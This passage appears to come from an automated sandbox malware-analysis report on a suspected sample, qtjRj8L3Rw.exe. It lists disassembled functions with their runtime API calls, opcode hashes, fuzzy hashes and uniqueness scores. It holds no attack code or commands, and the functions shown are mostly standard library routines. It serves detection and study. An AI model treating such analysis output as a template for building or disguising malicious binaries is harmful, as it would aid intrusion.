                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C0D53F
                                  • _free.LIBCMT ref: 00C0D54A
                                  • _free.LIBCMT ref: 00C0D59E
                                  • _free.LIBCMT ref: 00C0D5A9
                                  • _free.LIBCMT ref: 00C0D5B4
                                  • _free.LIBCMT ref: 00C0D5BF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                  • Instruction ID: 56955bcdcf579eca3fd71b788ea813ec6987de44be321843d8929bca334c310c
                                  • Opcode Fuzzy Hash: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                  • Instruction Fuzzy Hash: 9F116A71585B04EADA20BBF0DC07FCB779DAF01700F408C25B29BA60D2DA24FA15E765
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C08032, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleCP.KERNEL32(00C01707,00000000,?), ref: 00C0807A
                                  • __fassign.LIBCMT ref: 00C08259
                                  • __fassign.LIBCMT ref: 00C08276
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C082BE
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C082FE
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C083AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                  • String ID:
                                  • API String ID: 4031098158-0
                                  • Opcode ID: ebd4bcd1c19ade7974fd106217de7acebe6861305b71e7734b2de3ad5921053f
                                  • Instruction ID: c5bd36593be7589d1657f2db8b5d0360eb90a660ef24981f47cd895384faa0f3
                                  • Opcode Fuzzy Hash: ebd4bcd1c19ade7974fd106217de7acebe6861305b71e7734b2de3ad5921053f
                                  • Instruction Fuzzy Hash: E2D19E71D002589FCF15CFA8C980AEDBBB5BF48710F288169E895F7391DA309A4ACF50
                                  Uniqueness

                                  Uniqueness Score: 0.81%

                                  Function 00BEB390, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 491UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEB5A7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEB5BD
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEB9F7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BEBA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 23600c08db850a826eef536de007d7ad6c5b446380cdb6ac3df89bb0d96ca2a4
                                  • Instruction ID: 5e83a61e19299f295bd9a121b3db0772a3785394698c7f9229cdfd1bd9de971c
                                  • Opcode Fuzzy Hash: 23600c08db850a826eef536de007d7ad6c5b446380cdb6ac3df89bb0d96ca2a4
                                  • Instruction Fuzzy Hash: FC22AF709002998FDF28DF25C894BEEBBB5AF45300F1482D9E459A7782DB749E88CF51
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C0305C, Relevance: 9.2, APIs: 6, Instructions: 221COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00C030EC
                                  • _free.LIBCMT ref: 00C03107
                                  • _free.LIBCMT ref: 00C03112
                                  • _free.LIBCMT ref: 00C0321F
                                    • Part of subcall function 00C06876: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0710F,00000001,00000364,00000006,000000FF,?,?,?,00C0185C,00C06950), ref: 00C068B7
                                  • _free.LIBCMT ref: 00C031F4
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C03215
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Heap$AllocateErrorFreeLast
                                  • String ID:
                                  • API String ID: 4150789928-0
                                  • Opcode ID: 188f701c1f77bcc6224be510d04dfff20d4149ac8fcf7266c66637a36a71e207
                                  • Instruction ID: f4e03a2dbb0f6a43463a6a98fcdf4cb4d8cbfc8558b47b9c3b2591ca089e64a0
                                  • Opcode Fuzzy Hash: 188f701c1f77bcc6224be510d04dfff20d4149ac8fcf7266c66637a36a71e207
                                  • Instruction Fuzzy Hash: 56519C3AA042506BDF14AFB89842BBE77ADDF85710F244059F951DB2C2EA32DF02D360
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00BE9CB0, Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BE9CF0
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BE9D12
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE9D32
                                  • __Getctype.LIBCPMT ref: 00BE9DCB
                                  • std::_Facet_Register.LIBCPMT ref: 00BE9DEA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE9E02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                  • String ID:
                                  • API String ID: 1102183713-0
                                  • Opcode ID: 1f6fdf7a85c295be51d438303d8b6d4f35065f8f32fa54da0ec65ce4528030d5
                                  • Instruction ID: 497f865854fdfc3e542e6445b5b2a792faa6ce3cb32a494ac86e942776d4078e
                                  • Opcode Fuzzy Hash: 1f6fdf7a85c295be51d438303d8b6d4f35065f8f32fa54da0ec65ce4528030d5
                                  • Instruction Fuzzy Hash: DE419D71900668DBCB21DF19DC81BAEB7F4EB14710F2481B9E945AB391EB30AD49CBD1
                                  Uniqueness

                                  Uniqueness Score: 1.47%

                                  Function 00BF8EBA, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00BF8EB1,00BF70D0,00BF4FB8), ref: 00BF8EC8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF8ED6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF8EEF
                                  • SetLastError.KERNEL32(00000000,00BF8EB1,00BF70D0,00BF4FB8), ref: 00BF8F41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: d2c1b4ab2e239666d12ad2f9bec2c4ffc0c82e029dc89cc3d048ff36f3c5f082
                                  • Instruction ID: 0ff35470c733b2c47776e5ef3c32264a80b3b42210eb917b2698d786ea231223
                                  • Opcode Fuzzy Hash: d2c1b4ab2e239666d12ad2f9bec2c4ffc0c82e029dc89cc3d048ff36f3c5f082
                                  • Instruction Fuzzy Hash: E401FC322293195D97241775BCC5B7E2AD5EB0637473007AAF314674E0EF618C0BA145
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  Function 00BF9F8E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00BFA04F,?,?,00C2F874,00000000,?,00BFA17A,00000004,InitializeCriticalSectionEx,00C1E0F4,00C1E0FC,00000000), ref: 00BFA01E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-
                                  • API String ID: 3664257935-2084034818
                                  • Opcode ID: 618ef789e296b8d996ae03dba93b441024c7406551fe7c9303ccd79e43cf37e2
                                  • Instruction ID: 220693adcf47c12b3ac8785cf9a9b3fe128e4262c9080a749a0d108a57310455
                                  • Opcode Fuzzy Hash: 618ef789e296b8d996ae03dba93b441024c7406551fe7c9303ccd79e43cf37e2
                                  • Instruction Fuzzy Hash: 1611E371A01229EBCB224B78AC447AD37E4EF06760F2541A0EB04FB280DA75FC0896D2
                                  Uniqueness

                                  Uniqueness Score: 1.64%

                                  Function 00C02B9F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderUNIQUELIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00C02B94,00000000,?,00C02B5C,?,?,00000000), ref: 00C02BB4
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C02BC7
                                  • FreeLibrary.KERNEL32(00000000,?,?,00C02B94,00000000,?,00C02B5C,?,?,00000000), ref: 00C02BEA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 425b2059c6e8585c488e1117768be9ffac15a927e0e0901fb39e47eeeccf24d5
                                  • Instruction ID: e087d94d1b256f6d2e2df321670f806a1c78e09538c6883dcddf01da89afbe6f
                                  • Opcode Fuzzy Hash: 425b2059c6e8585c488e1117768be9ffac15a927e0e0901fb39e47eeeccf24d5
                                  • Instruction Fuzzy Hash: 96F01C31506219FBDF11AF91DC0EBDE7B68FB02755F248060E806A21A0CB709F41EA95
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C049EC, Relevance: 7.8, APIs: 5, Instructions: 264COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • _free.LIBCMT ref: 00C04CF9
                                  • _free.LIBCMT ref: 00C04D12
                                  • _free.LIBCMT ref: 00C04D50
                                  • _free.LIBCMT ref: 00C04D59
                                  • _free.LIBCMT ref: 00C04D65
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorLast
                                  • String ID:
                                  • API String ID: 3291180501-0
                                  • Opcode ID: d12cfb22ca7cfabd9b3543f976b9a6cca7387d74ad041b3771f0ef4f1b78d097
                                  • Instruction ID: ba9abc26b9586c74ae238fc9c3dfe0a02c77c7ecb04ca961ca1d1a9f05ac2e3c
                                  • Opcode Fuzzy Hash: d12cfb22ca7cfabd9b3543f976b9a6cca7387d74ad041b3771f0ef4f1b78d097
                                  • Instruction Fuzzy Hash: 53B12FB5A012199FDB28DF18C884BAEB7B4FF48314F1445EAE949A7390D771AE90CF40
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C04561, Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C0690D: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BF48E0,?,?,00BE8B4A,?,?,00BD1154), ref: 00C0693F
                                  • _free.LIBCMT ref: 00C04670
                                  • _free.LIBCMT ref: 00C04687
                                  • _free.LIBCMT ref: 00C046A4
                                  • _free.LIBCMT ref: 00C046BF
                                  • _free.LIBCMT ref: 00C046D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$AllocateHeap
                                  • String ID:
                                  • API String ID: 3033488037-0
                                  • Opcode ID: 45588ea89d4668b0e037d21236089d4f36505f99e27f14c9babe03a345d23a4a
                                  • Instruction ID: 73ab3deb11306038716b56ebe3dbd111bf820c62815e6e8ae2af261d5f57b09a
                                  • Opcode Fuzzy Hash: 45588ea89d4668b0e037d21236089d4f36505f99e27f14c9babe03a345d23a4a
                                  • Instruction Fuzzy Hash: 5251C0B2A00604EFDB28DF69DC41A6BB7F4EF49720B144669F519D72D0E732EA01DB90
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00BEA760, Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BEA78D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BEA7AD
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BEA7CD
                                  • std::_Facet_Register.LIBCPMT ref: 00BEA86B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BEA883
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                  • String ID:
                                  • API String ID: 459529453-0
                                  • Opcode ID: e402af3284efea87713c83355849c6270cc29a97dde739a87dcae7e6a75fd0f1
                                  • Instruction ID: 24b59ead9c5094f5e085dbca622f423424be7e0ddedd2baa0a984a2db8b29d4d
                                  • Opcode Fuzzy Hash: e402af3284efea87713c83355849c6270cc29a97dde739a87dcae7e6a75fd0f1
                                  • Instruction Fuzzy Hash: 0641BF72910258CFCB28DF15D891BAEBBF8EB14710F1541A9E8056B351DB31BD46CBD2
                                  Uniqueness

                                  Uniqueness Score: 0.53%

                                  Function 00C0CFBA, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00C0CFD2
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C0CFE4
                                  • _free.LIBCMT ref: 00C0CFF6
                                  • _free.LIBCMT ref: 00C0D008
                                  • _free.LIBCMT ref: 00C0D01A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: da5cbb19b7bc0fce347e492826ceb23762ed6ad73baf6a85f967de8d770befb2
                                  • Instruction ID: c81d9d530b89900198751d025780a4caf7ad324f5b2fd602cd323b98a8d25f5a
                                  • Opcode Fuzzy Hash: da5cbb19b7bc0fce347e492826ceb23762ed6ad73baf6a85f967de8d770befb2
                                  • Instruction Fuzzy Hash: FBF0123251422067CA30EFD4E4C1E1F77DAAA01710B544915F02AE7DC1CB30FD91DBA5
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00BDA230, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00BDA484
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: <$?$mxyz
                                  • API String ID: 118556049-2422011075
                                  • Opcode ID: 9399e1208a94ccaf9b9fdf37652b3fee5b068c650358d08d410c41ca6b0852d6
                                  • Instruction ID: fa8c9552b99975751fd79a91874bb2f56b797b27c2c096ec5dceecfffce27b84
                                  • Opcode Fuzzy Hash: 9399e1208a94ccaf9b9fdf37652b3fee5b068c650358d08d410c41ca6b0852d6
                                  • Instruction Fuzzy Hash: 3261F471D00288CBDB24DF68C8447AEFBF5EF44314F2446AEE415A7381E7B59A89CB91
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BD3420, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BD362E
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BD363D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: ed97a513914cc2fc80b9f6e3d76fb14001e8d86d5f1d77fb82f02017d3a1b1e9
                                  • Instruction ID: b6583b3ed6b3bbdefd87bcaf401c1f480bc71712a70a0f86ba01dd4fb3a78588
                                  • Opcode Fuzzy Hash: ed97a513914cc2fc80b9f6e3d76fb14001e8d86d5f1d77fb82f02017d3a1b1e9
                                  • Instruction Fuzzy Hash: BC51F3719002489FEB18CF68D945BAEFBF5EF85704F10469DE404A7392EB74DA848B51
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C02C71, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C:\Users\user\Desktop\qtjRj8L3Rw.exe
                                  • API String ID: 0-552899506
                                  • Opcode ID: b21ec01b14434e392af2c1578bb7ab591fcf3b49f30ae5bc976b97ee0fcc2216
                                  • Instruction ID: 8ee7e392a6725c59af62c33e3e634776d6da8df87a94bac8284d67c7ca21aeed
                                  • Opcode Fuzzy Hash: b21ec01b14434e392af2c1578bb7ab591fcf3b49f30ae5bc976b97ee0fcc2216
                                  • Instruction Fuzzy Hash: FD317271A00318ABDB21DF99D989EAEBBF8EB89710B50407AF814D7291D6709F41DB60
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BF95DE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112UNIQUELIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BF9603
                                  • CatchIt.LIBVCRUNTIME ref: 00BF96E9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CatchEncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 1435073870-2084237596
                                  • Opcode ID: f94cd707fb072880aa2a27f0333a8a3acbda37b8eb01464c84140305c25c97e0
                                  • Instruction ID: e9f12e4d21af4c99301919b5b56adb9257ce302399f9ab69f47dc7645369ffec
                                  • Opcode Fuzzy Hash: f94cd707fb072880aa2a27f0333a8a3acbda37b8eb01464c84140305c25c97e0
                                  • Instruction Fuzzy Hash: 1741347290020DAFDF16DF98CD81AEEBBB5FF48304F188199FA04A7261D3359A54DB50
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BD2BD0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BD2C5F
                                    • Part of subcall function 00BF731A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00BD21DC,?,?,?,00BD21DC,?,00C2D414), ref: 00BF737A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
